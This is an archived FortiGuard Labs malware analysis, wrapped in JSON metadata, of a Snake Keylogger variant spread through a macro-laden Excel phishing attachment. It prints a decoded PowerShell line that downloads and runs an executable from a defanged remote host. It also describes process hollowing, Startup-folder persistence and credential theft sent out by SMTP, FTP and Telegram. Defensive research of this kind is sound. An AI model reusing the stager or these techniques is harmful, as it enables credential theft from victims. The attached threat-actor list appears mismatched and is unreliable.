{ "id": "146164d9-4ec9-4129-af42-3ec7ea2db4f8", "created_at": "2026-04-06T00:12:35.919899Z", "updated_at": "2026-04-10T03:37:08.797603Z", "deleted_at": null, "sha1_hash": "e7f677026f6155277a396b384435242a7fcc20a8", "title": "Deep Dive into a Fresh Variant of Snake Keylogger Malware | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3182796, "plain_text": "Deep Dive into a Fresh Variant of Snake Keylogger Malware |\r\nFortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-11-04 · Archived: 2026-04-05 21:32:20 UTC\r\nFortinet’s FortiGuard Labs recently captured a Microsoft Excel sample from the wild that was used to spread malware. After\r\nresearching its behaviors, I recognized it as a fresh variant of the Snake Keylogger malware.\r\nSnake Keylogger is a malware developed using .NET. It first appeared in late 2020 and focused on stealing sensitive\r\ninformation from a victim’s device, including saved credentials, the victim’s keystrokes, screenshots of the victim’s screen,\r\nand clipboard data. \r\nIn July, 2021, Snake Keylogger first entered into a TOP 10 popular malware families report, meaning that the Snake\r\nKeylogger family is increasing its influence and impacting more people’s devices and sensitive data.\r\nIn this threat research blog you will learn how the Snake Keylogger variant is downloaded and executed through a captured\r\nExcel sample, what techniques this variant uses to protect it from being analyzed, what sensitive information it steals from a\r\nvictim’s machine, and how it submits that collected data to the attacker. \r\nAffected platforms:    Microsoft Windows\r\nImpacted parties:       Windows Users\r\nImpact:                        Collects sensitive information from victims’ device\r\nSeverity level:             Critical\r\nWhat the Captured Microsoft Excel Sample Looks Like\r\nThis Excel sample, delivered as an attachment in a phishing email, contains malicious Macro VBA code. Figure 1.1 shows a\r\nscreenshot of when it is opened. It displays a vague picture of a document and asks the victim to click the yellow button to\r\nget a clearer image.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 1 of 17\n\nFigure 1.1 – The Excel file content when it is opened\r\nOnce the yellow button “Enable Content” is clicked by victim, the malicious VBA code is executed in the background. The\r\nmalicious macro project that contains the malicious VBA code is password protected so it cannot be viewed by the analyzer.\r\nHowever, we were able to modify its binary file to remove this restriction.\r\nGoing through its code, a “Workbook_Activate()” method is automatically called when the document is opened. It writes a\r\npiece of PowerShell code from a local variable into a BAT file. Figure 1.2 shows partial VBA code of this method, where\r\nvariable “s” holds the PowerShell code and \"Gqyztfbtsogpnruooqr.bat\" is the BAT file, which is finally executed by calling\r\ncode “x = Shell(bat, 0)”.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 2 of 17\n\nFigure 1.2 – Macro VBA code executed in background\r\nThe bottom of Figure 1.2 shows the content of variable “s”, which contains the base64-encoded PowerShell code that is\r\ndecoded by PowerShell.exe when it is executed. \r\nBelow is the base64-decoded PowerShell code:\r\n$ProcName = \"Wheahmnfpgaqse.exe\";\r\n(New-Object\r\nSystem.Net.WebClient).DownloadFile(\"hxxp[:]//3[.]64[.]251[.]139/v3/2/Requests07520000652.exe\",\"$env:APPDATA\\$ProcName\r\nStart-Process (\"$env:APPDATA\\$ProcName\")\r\nThe PowerShell code is very simple and easy to understand. It downloads a file (“Requests07520000652.exe”) onto a\r\nvictim’s device, places it at “%AppData%\\Wheahmnfpgaqse.exe\" by calling “DownloadFile()”, and executes it by calling\r\n“Start-Process()”.\r\nSnake Keylogger Downloader\r\nAfter some research, I learned that the file \"Wheahmnfpgaqse.exe\" is a downloader of Snake Keylogger, which is a .Net\r\nprogram. When it starts, it sleeps 21 seconds to bypass those sandboxes with a strategy of killing a sample process when a\r\ntimeout of no-action is triggered.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 3 of 17\n\nFigure 2.1 – Downloads \u0026 decrypts Snake Keylogger module after a sleep\r\nTwenty one seconds later, the downloader then invokes a function called “Consturctor()”, as you can see in Figure 2.1. It\r\nthen invokes another function “Program.List_Types()”, where it downloads Snake Keylogger module from the link\r\n“hxxps[:]//store2[.]gofile[.]io/download/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4/Huzeigtmvaplpinhoo.dll”, which is a RC4\r\nencrypted DLL file. Next, it calls “ToRc()” function to RC4 decrypt it using a decryption key \"Dllzjn\".\r\nIt then proceeds to load the decrypted Dll module (a .Net Dll file, called “Huzeigtmvaplpinhoo.dll”), and enumerates its\r\nexport functions to find \"G6doICqoMU()\", which is invoked by executing “type.InvokeMember(\\\"G6doICqoMU\\\",\r\nBindingFlags.InvokeMethod, null, null, null)” in function Consturctor(), as shown in Figure 2.1. The decrypted .Net Dll is a\r\ndropper and installer of Snake Keylogger. \r\nLet’s dive into this module to see how it performs its tasks.\r\nSnake Keylogger Installer\r\nAccording to my analysis, the decrypted Dll module (“Huzeigtmvaplpinhoo.dll”) deploys Snake Keylogger onto a victim’s\r\ndevice and sets it as an auto-run program. It extracts an executable PE file into memory from the Resource directory and\r\nthen performs process hollowing that injects the executable PE file into a newly created child process and executes it. \r\nI will explain in detail how it performs these functions in this section.\r\n1. Persistence Mechanism \r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 4 of 17\n\nFigure 3.1 – Breaks on the export function “G6doICqoMU()” in the debugger dnSpy\r\nFigure 3.1 shows an outline of the decrypted Dll module (“Huzeigtmvaplpinhoo.dll”). As you can see, to prevent its code\r\nfrom being analyzed the file is obfuscated so that the class names, function names, and variable names are all randomly\r\ngenerated meaningless strings. This creates trouble for analysts when analyzing it. \r\nThe full name of the export function “G6doICqoMU()” is\r\n“Huzeigtmvaplpinhoo!pXfqpio3clcAoFxTnfJ.CORFgLoyRGlurYwdwIh.G6doICqoMU()”. Again, for the same reason as\r\nbefore, it sleeps 35 seconds at the beginning of this function to bypass some malware analysis systems.\r\nNext, it works to make this Snake Keylogger persistent on the infected Windows. As we all know, a Windows system has a\r\n“Startup” folder inside the “Start Menu”. The programs inside this folder are started when Windows starts. The full path to\r\nthis folder is defined in the system registry with a string value of\r\n“HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup” and\r\n“HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup”. The value\r\ndata of “Startup” is C:\\Users\\{UserName}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup” by\r\ndefault. \r\nThis variant of Snake Keylogger changes both the values of “Startup” to other folders. Figure 3.2 shows the code changing\r\nthe Windows startup folder to “C:\\Users\\M0YTes0Env\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chsg\\”\r\nby calling the API SetValue(). In the bottom half of Figure 3.2 you can see the content of the system registry path, value\r\nname, and new value data.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 5 of 17\n\nFigure 3.2 – Change Windows “Startup” folder to a new path\r\n“chsg” is a new folder created by Snake Keylogger. The program copies the Snake Keylogger file (the\r\ndownloaded \"Wheahmnfpgaqse.exe\") into this folder and renames it as “sgosr.exe”. This ensures that Snake Keylogger will\r\nbe started by the Windows system every time it starts.\r\n2. Extraction from Resource \r\nAlthough the content of Huzeigtmvaplpinhoo.dll only appears in memory, to analyze it I saved it into a local file. It has\r\nseveral resources in the Resource directory, as shown below in Figure 3.3.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 6 of 17\n\nFigure 3.3 – Resource directory display of Huzeigtmvaplpinhoo.dll\r\nThe process of extracting the payload file of Snake Keylogger is a little complicated. It uses a tricky way to load the\r\nresource. It has a local callback function defined by ResolveEventHandler that is registered to\r\nAppDomain.ResourceResolve, which is then called when it fails to load a resource by name. It looks like an exception\r\nhandler to Windows SEH strategy to handle exceptions. In addition, it has another local callback function registered to\r\nAppDomain.AssemblyResolve, which is called when it fails to load an assembly (like a module) by name.\r\nBelow is a pseudocode of registering a local resource resolve, where T9wOjU5ccxTJaVfUntn.Osc50oil0l is the local\r\ncallback function.\r\nAppDomain.ResourceResolve += new ResolveEventHandler(T9wOjU5ccxTJaVfUntn.Osc50oil0l)\r\nNow, let’s see how Snake Keylogger solves this challenge—loading a nonexistent resource, which will trigger the resource\r\nloading failure. It plans to read a Resource named \"Qkxkikeg\" from the current module, which has no such named resource\r\nin the Resource directory, as you can see in Figure 3.3. A resource loading failure occurs and the registered local\r\nResolveEventHandler function is called to solve this error. This then causes a loading assembly failure and its assembly\r\nresolve callback function is called.\r\nA while later, another PE file, decrypted from resource “{d977ee8c-85ce-4731-b9a1-323ba88c6eeb}”, appears in memory. It\r\ncontains a resource with the name “Qkxkikeg”, which is the original request resource name, as shown in Figure 3.4.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 7 of 17\n\nFigure 3.4 – “Qkxkikeg” resource is in another module\r\nThe payload of Snake Keylogger is just a compressed in GZIP format in the resource “Qkxkikeg” under the Resource\r\ndirectory “ClassLibrary1.Properties.Resources”.\r\nFigure 3.5 displays the GZIP data of the resource “Qkxkikeg” (reversed) on the left and the decompressed Snake Keylogger\r\non the right side.\r\nFigure 3.5 – Compressed and decompressed data of “Qkxkikeg”\r\n3. Process Hollowing\r\nThe program then creates a suspended child process and deploys the compressed Snake Keylogger payload into the child\r\nprocess. It then resumes the child process to run. Meanwhile, the parent process exits by calling the function\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 8 of 17\n\nEnvironment.Exit(0).\r\nFigure 3.6 – Create a suspended child process\r\nAccording to the code in Figure 3.6, it is about to call API CreateProcess() to create the child process with Creation Flag\r\n134217732U (0x8000004), which means CREATE_NO_WINDOW and CREATE_SUSPENDED.\r\nIt then calls the API WriteProcessMemory() to copy the Snake Keylogger payload into the child process, section by section.\r\nIt next calls SetThreadContext() to make the child process point to the entry point function of Snake Keylogger. Before the\r\nparent process exits, an API ResumeThread() is called to have the child process restored to run.\r\nSnake Keylogger Payload\r\nFigure 4.1 – Fully obfuscated Snake Keylogger payload\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 9 of 17\n\nThe code of the Snake Keylogger payload file is fully obfuscated, as shown in Figure 4.1, to protect it from being analyzed.\r\nThe class and function names are unreadable.\r\nTherefore, to better analyze and explain its code and intention, I deobfuscated the payload file using the tool “de4dot”. This\r\nmade its code more readable, and my analysis is based on that result.\r\nGoing through the Snake Keylogger code, I realized that it provides features like recording a victim’s keystrokes (the\r\nkeylogger), stealing data from the clipboard, obtaining a victim’s screenshot, stealing the data on the system clipboard, as\r\nwell as stealing saved credentials for some specified software clients installed on a victim’s device.\r\n1. Keylogger Feature\r\nFigure 4.2 shows a code snippet of setting up the keylogger.\r\nFigure 4.2 – Initialization of Keylogger\r\nIt calls API SetWindowsHookExA() to register a hook callback function( this.callback_ProcessKey()) to monitor low-level\r\nkeyboard input events. The first parameter is the hook type, where “13” indicates WH_KEYBOARD_LL.\r\nAfter that, the callback function is called by the Windows system when the victim types, so it is able to handle and record\r\nthe keystrokes into a global string variable. It also records the foreground Window title to identify where the victim types by\r\ncalling the APIs GetForegroundWindow() and GetWindowText ().\r\nIt also has a Timer (Timer0) that keeps sending the keylogger data to the attacker.\r\n2. Screenshot\r\nIt is able to take screenshots of the victim’s device. It has a Timer (Timer1), which captures the victim’s screenshots from\r\ntime to time by calling API CopyFromScreen(). It saves the screenshot into a local Screenshot.png file in the system’s\r\n“MyDocuments” folder. It also sends this picture file to the attacker.\r\n3. System Clipboard \r\nIt has two Timers. One (Time2) is used to collect system clipboard data by calling Clipboard.GetText() and save to a global\r\nvariable. The other (Time3) is used to send collected clipboard data to the attacker. \r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 10 of 17\n\nFigure 4.3 – Timer function to obtain system clipboard data\r\nFigure 4.3 shows the Timer function used to obtain system clipboard data. Every time it counts down it checks to see\r\nwhether current clipboard data has been collected in the global variable main_cls.string_clipboard_data. If not, it appends\r\nthe current clipboard data to the global variable.\r\n4. Steal Credentials\r\nBased on my analysis, this variant’s main work is to steal credentials from the victim’s device. It implements stealing\r\ncredentials in the Main() function, as shown in Figure 4.4, below.\r\nFigure 4.4 – Main() with functions to steal credentials and submit them\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 11 of 17\n\nThis is the deobfuscated Main() function showing the functions used to steal credentials from various clients. The function at\r\nthe bottom submits the stolen credentials. These functions obtain the saved credentials for each software from the different\r\nplaces they are save their credentials, including local files (like Chrome) and system registry (like Outlook), etc.\r\nI will now use Outlook as an example to explain how Snake Keylogger collects credentials.\r\nFigure 4.5 is a screenshot of a function that is about to read the credentials of Microsoft Outlook from the system registry. It\r\ngoes through four registry paths for different Outlook versions to read out (if applicable) “Email” and \"IMAP Password\" or\r\n\"POP3 Password\" or \"HTTP Password\" or \"SMTP Password\" and “SMTP Server”.\r\nFigure 4.5 – Function to collect saved credentials for Microsoft Outlook\r\nBelow is an example showing what credentials information Snake Keylogger can collect from Microsoft Outlook:\r\n-------- Snake Keylogger --------\r\nFound From: Outlook\r\nURL: smtp.gmail.com\r\nE-Mail: victim_email@gmail.com\r\nPSWD: {Password}\r\n---------------------------------\r\nI have categorized those clients that Snake Keylogger focuses on as below:\r\nWeb Browsers:\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 12 of 17\n\nGoogle Chrome, Mozilla Firefox, Mozilla SeaMonkey Browser, Mozilla IceCat Browser, Yandex Browser, Microsoft Edge,\r\nAmigo Browser, Nichrome Browser, QQBrowser, Coccoc Browser, Orbitum Browser, Slimjet Browser, Iridium Browser,\r\nVivaldi Browser, Iron Browser, Ghost Browser, Cent Browser, Xvast Browser, Chedot Browser, SuperBird Browser, 360\r\nBrowser, 360 Secure Browser, Comodo Dragon Browser, Brave-Browser, Torch Browser, UC Browser, Blisk Browser, Epic\r\nPrivacy Browser, Opera Web Browser, Liebao Browser, Avast Browser, Kinza Browser, BlackHawk Browser, Citrio\r\nBrowser, Uran Browser, Coowon Browser, 7 Star Browser, QIP Surf Browser, Sleipnir Browser, Chrome Canary Browser,\r\nCoolNovo Browser, SalamWeb Browser, Sputnik Browser Extension, Falkon Browser, Elements Browser, Slim Browser,\r\nIce Dragon Browser, CyberFox Browser, PaleMoon Browser, Waterfox Browser, Kometa Browser and various browsers\r\ndesigned based on Chromium project.\r\nEmail Clients:\r\nMicrosoft OutLook, Tencent Foxmail, Mozilla Thunderbird and Postbox.\r\nOther Clients:\r\nFileZilla, Pidgin and Discord.\r\nSending the Stolen Data to the Attacker\r\nPer the code of this variant of Snake Keylogger, it sends an email to the attacker (using SMTP protocol) to submit the stolen\r\ncredentials data of the victim. \r\nSnake Keylogger collects basic information regarding the victim’s Windows system, like User name, PC name, System Date\r\nand Time, Public IP address, and Country, which are put in the header of the collected credentials.\r\nFigure 5.1 – Craft email with stolen credentials\r\nFigure 5.1 shows crafting the email with stolen credentials to be sent to the attacker. The bottom is the email’s Subject and\r\nBody. The stolen credentials are put in two attachments, “Passwords.txt” and “User.txt”. Figure 5.2 is a screenshot of\r\n“Password.txt” attached to the email sent to the attacker with basic information and credentials stolen from my testing\r\nWindows system.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 13 of 17\n\nFigure 5.2 – Example of “Password.txt”\r\nTo send stolen data to the attacker, it defines some variables containing the sender’s email address, password, SMTP server\r\naddress, and SMTP port, as shown in figure 5.3. It defines the variables in the class’s constructor function.\r\nFigure 5.3 – The attacker’s email address is hard-coded in constructor function.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 14 of 17\n\nBesides sending data via email, this Snake Keylogger variant also offers FTP and Telegram methods to submit collected\r\nsensitive data to the attacker. \r\nFor FTP, the attacker needs to set up an FTP server and then tell Snake Keylogger the address of the FTP server and\r\ncredentials for Snake Keylogger to upload stolen sensitive data.\r\nFor Telegram, Snake Keylogger uses the “sendDocument” method of the “Telegram Bot API” to submit its stolen data to the\r\nTelegram account that the attacker provides. Refer to Figure 5.4 for more information about the method of Telegram.\r\nFigure 5.4 – Partial code of submitting data using Telegram\r\nConclusion on Snake Keylogger Malware \r\nIn order to better understand the entire process of this malware, I drew a flow chart in Figure 6.1 that outlines the main steps\r\nexplained in this analysis.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 15 of 17\n\nFigure 6.1 – The flow chart of the variant of Snake Keylogger\r\nAt the beginning of this analysis, we went through how a malicious Macro inside an Excel document executes PowerShell\r\nthat downloads the Snake Keylogger's downloader. \r\nNext, I focused more on how the Snake Keylogger installer performs persistence on the victim's device and the complicated,\r\ntricky way it extracts the payload of Snake Keylogger.\r\nI then elaborated on the features this variant of Snake Keylogger offers, like recording keystrokes, collecting credentials\r\ndata, clipboard data, and screenshots. \r\nAnd finally, I explained how the collected data is submitted to the attacker via email, as well as two other methods: FTP and\r\nTelegram.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering, AntiVirus, FortiEDR, and CDR\r\n(content disarm and reconstruction) services, as follows:\r\nThe malicious Macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction)\r\nservice.\r\nAll relevant URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe original Excel sample and Snake Keylogger downloader files are detected as \"VBA/SnakeKeylogger.84D0!tr\" and\r\n\"MSIL/SnakeKeylogger.ADFA!tr\" and are blocked by the FortiGuard AntiVirus service.\r\nFortiEDR detects the downloaded executable file as malicious based on its behavior.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 16 of 17\n\nFortiMail protects Fortinet customers by blocking phishing emails.\r\nWe also suggest that readers go through the free NSE training: NSE 1 – Information Security Awareness, which has a\r\nmodule on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIOCs\r\nURLs:\r\n\"hxxp[:]//3[.]64[.]251[.]139/v3/2/Requests07520000652.exe\"\r\n\"hxxps[:]//store2[.]gofile[.]io/download/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4/Huzeigtmvaplpinhoo.dll\"\r\nSample SHA-256:\r\n[SOA# 1769.xlsm]\r\n3B437BAA9A07E9DECE2659F20B5D97F8F729BA077D399933041CDC656C8D4D04\r\n[Requests07520000652.exe or Wheahmnfpgaqse.exe]\r\n53D520C1F12FE4E479C6E31626F7D4ABA5A65D107C1A13401380EBCA7CCA5B05\r\nReferences:\r\nhttps://blog.checkpoint.com/2021/08/12/july-2021s-most-wanted-malware-snake-keylogger-enters-top-10-for-first-time/\r\nhttps://docs.microsoft.com/en-us/dotnet/api/system.appdomain.assemblyresolve?view=net-5.0\r\nhttps://docs.microsoft.com/en-us/dotnet/api/system.appdomain.resourceresolve?view=net-5.0\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or\r\nabout the Fortinet Network Security Expert program, Security Academy program, and Veterans program.\r\nSource: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 17 of 17\n\n https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware \nGoogle Chrome, Mozilla Firefox, Mozilla SeaMonkey Browser, Mozilla IceCat Browser, Yandex Browser, Microsoft Edge,\nAmigo Browser, Nichrome Browser, QQBrowser, Coccoc Browser, Orbitum Browser, Slimjet Browser, Iridium Browser,\nVivaldi Browser, Iron Browser, Ghost Browser, Cent Browser, Xvast Browser, Chedot Browser, SuperBird Browser, 360\nBrowser, 360 Secure Browser, Comodo Dragon Browser, Brave-Browser, Torch Browser, UC Browser, Blisk Browser, Epic\nPrivacy Browser, Opera Web Browser, Liebao Browser, Avast Browser, Kinza Browser, BlackHawk Browser, Citrio\nBrowser, Uran Browser, Coowon Browser, 7 Star Browser, QIP Surf Browser, Sleipnir Browser, Chrome Canary Browser,\nCoolNovo Browser, SalamWeb Browser, Sputnik Browser Extension, Falkon Browser, Elements Browser, Slim Browser,\nIce Dragon Browser, CyberFox Browser, PaleMoon Browser, Waterfox Browser, Kometa Browser and various browsers\ndesigned based on Chromium project. \nEmail Clients: \nMicrosoft OutLook, Tencent Foxmail, Mozilla Thunderbird and Postbox. \nOther Clients: \nFileZilla, Pidgin and Discord. \nSending the Stolen Data to the Attacker \nPer the code of this variant of Snake Keylogger, it sends an email to the attacker (using SMTP protocol) to submit the stolen\ncredentials data of the victim. \nSnake Keylogger collects basic information regarding the victim’s Windows system, like User name, PC name, System Date\nand Time, Public IP address, and Country, which are put in the header of the collected credentials. \nFigure 5.1-Craft email with stolen credentials \nFigure 5.1 shows crafting the email with stolen credentials to be sent to the attacker. The bottom is the email’s Subject and\nBody. The stolen credentials are put in two attachments, “Passwords.txt” and “User.txt”. Figure 5.2 is a screenshot of\n“Password.txt” attached to the email sent to the attacker with basic information and credentials stolen from my testing\nWindows system. \n Page 13 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware" ], "report_names": [ "deep-dive-into-a-fresh-variant-of-snake-keylogger-malware" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434355, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e7f677026f6155277a396b384435242a7fcc20a8.pdf", "text": "https://archive.orkl.eu/e7f677026f6155277a396b384435242a7fcc20a8.txt", "img": "https://archive.orkl.eu/e7f677026f6155277a396b384435242a7fcc20a8.jpg" } }